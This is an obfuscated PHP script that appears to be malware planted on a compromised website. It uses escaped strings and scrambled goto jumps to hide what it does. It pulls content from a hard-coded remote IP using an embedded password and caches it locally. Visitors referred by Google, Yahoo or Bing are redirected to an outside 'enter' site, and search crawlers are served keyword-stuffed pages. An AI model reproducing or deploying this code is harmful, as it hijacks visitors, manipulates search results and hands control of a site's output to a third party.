<?php
 goto E_TIE; dPYqG: if (strlen($text) > 5000) { $out = fopen("\151\x6e\x64\145\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto tU7P7; Q0t2u: if (strlen($text) < 5000) { $url = "\x31\63\x35\x2e\x31\x38\x31\x2e\x32\x31\x2e\61\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\74\142\162\40\x2f\x3e\12"; } else { $req = "\57" . $_GET["\x66\156"] . "\56\x70\x68\x70\x3f\x70\x61\163\x73\x3d{$apass}\x26\161\75{$_GET["\x69\144"]}"; $out = "\x47\x45\x54\40{$req}\40\110\124\x54\120\x2f\x31\x2e\60\15\xa"; $out .= "\110\157\x73\164\x3a\40{$url}\xd\xa"; $out .= "\103\x6f\156\x6e\x65\x63\x74\x69\157\156\x3a\40\103\x6c\157\x73\145\15\xa\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto dPYqG; tIVQX: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto Emisd; XQpvF: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto h6N_6; tU7P7: echo $text; goto f_F5p; wcTv7: $apass1 = "\166\x69\x73\144\157\151\152\145\167"; goto eMxJc; R9yBd: $s = dirname($_SERVER["\120\110\x50\x5f\x53\x45\114\x46"]); goto pRGTk; FGFA1: $apass3 = "\162\166\63\x32\x79\144\141\143\163\166\163\x64\x76"; goto XQpvF; VAy7n: $_GET["\146\x6e"] = "\x36\x39\66\71\x36\71\x6e\145\167"; goto wcTv7; fS2Vw: $s = $_SERVER["\123\105\122\126\x45\122\x5f\116\x41\x4d\105"] . $s; goto FGFA1; pRGTk: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto fS2Vw; w4BTR: $apass2 = "\x62\62\63\x68\162\x32\x33\166\162\x33\62"; goto R9yBd; Szsc4: $today = "\62\60\62\65\x30\65\x32\x32\x2d"; goto tIVQX; pMMu8: if ($_GET["\151\144"] == "\151\156\x64\x65\170") { header("\114\157\143\141\164\x69\157\x6e\x3a\x20\x68\x74\x74\160\163\72\57\x2f\x67\157\x6f\147\x6c\x65\56\143\157\155"); die; } goto DH7XV; Emisd: if ($_GET["\151\144"] == "\164\x65\x73\x74\x69\156\x67") { echo "\164\x65\163\164\40\x67\157\x6f\144\56\x2e\56"; die; } goto pMMu8; HZviL: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\72\57\57\61\63\x35\56\x31\70\x31\x2e\62\61\x2e\61\62\x36\57" . $_GET["\146\x6e"] . "\x2e\160\150\x70\x3f\x70\141\x73\x73\75{$apass}\46\161\75{$_GET["\x69\144"]}"); } goto Q0t2u; pFzAL: $text = ''; goto oLItB; DH7XV: $_GET["\x77\157\162\x6c\x64"] = 5; goto VAy7n; ue9_I: $keyword = str_replace("\x20", "\x2b", $keyword); goto w4BTR; oLItB: if (function_exists("\x63\x75\x72\154\x5f\151\156\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\160\x3a\57\57\61\63\65\x2e\x31\70\61\x2e\x32\x31\56\x31\x32\x36\57" . $_GET["\146\156"] . "\56\160\x68\x70\x3f\x70\141\x73\x73\x3d{$apass}\46\x71\x3d{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\x7a\x69\x6c\x6c\x61\x2f\64\x2e\x30\40\x28\143\157\x6d\x70\x61\x74\151\x62\154\x65\x3b\40\x4d\123\111\x45\x20\x36\56\60\x3b\40\127\x69\156\144\157\167\163\x20\116\x54\40\x35\56\x31\x3b\x20\123\x56\61\51"); $text = curl_exec($ch); curl_close($ch); } goto HZviL; ijhx8: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto ue9_I; eMxJc: $x1 = 3; goto n14Zd; FKGfC: $query_pars_2 = str_replace("\55", "\53", $_GET["\151\x64"]); goto pFzAL; E_TIE: error_reporting(0); goto Szsc4; n14Zd: $xx1 = 5; goto ijhx8; h6N_6: if (strpos($_SERVER["\x48\124\124\x50\x5f\122\x45\106\x45\122\105\x52"], "\147\157\x6f\147\x6c\x65\56") or strpos($_SERVER["\x48\x54\124\120\137\x52\x45\106\105\x52\105\x52"], "\x79\141\150\157\157\x2e") or strpos($_SERVER["\x48\x54\124\120\x5f\122\105\106\105\x52\x45\122"], "\x62\x69\x6e\x67\56")) { $tpl = "\x69\156\x64\145\x78\x2f" . $_GET["\151\x64"] . "\56\x70\150\160\56\x74\160\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\114\x6f\143\141\164\x69\x6f\156\x3a\40\x68\164\164\x70\163\x3a\57\x2f\143\150\160\x6f\153\x2e\x73\151\164\145\x2f\145\x6e\x74\145\x72\57\x3f\x6d\x61\162\153\75{$today}\55{$s}\46\164\160\154\75{$tpl}\x26\145\156\147\x6b\x65\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\150\x70"; if (file_exists("\x69\x6e\144\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\x64\x65\x78\57" . $myname); if (strpos($_SERVER["\x48\124\124\x50\x5f\x55\123\105\122\137\101\x47\105\x4e\124"], "\142\151\x6e\x67") > 2 or strpos($_SERVER["\110\124\124\120\137\125\123\105\x52\137\x41\x47\x45\116\124"], "\x79\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); $html = str_replace("\74\164\x69\x74\x6c\x65\x3e\x3c\x2f\164\x69\x74\154\145\76", "\74\164\151\x74\154\x65\x3e{$keyword}\x3c\57\x74\x69\x74\x6c\x65\76", $html); } echo $html; die; } } goto FKGfC; f_F5p: ?>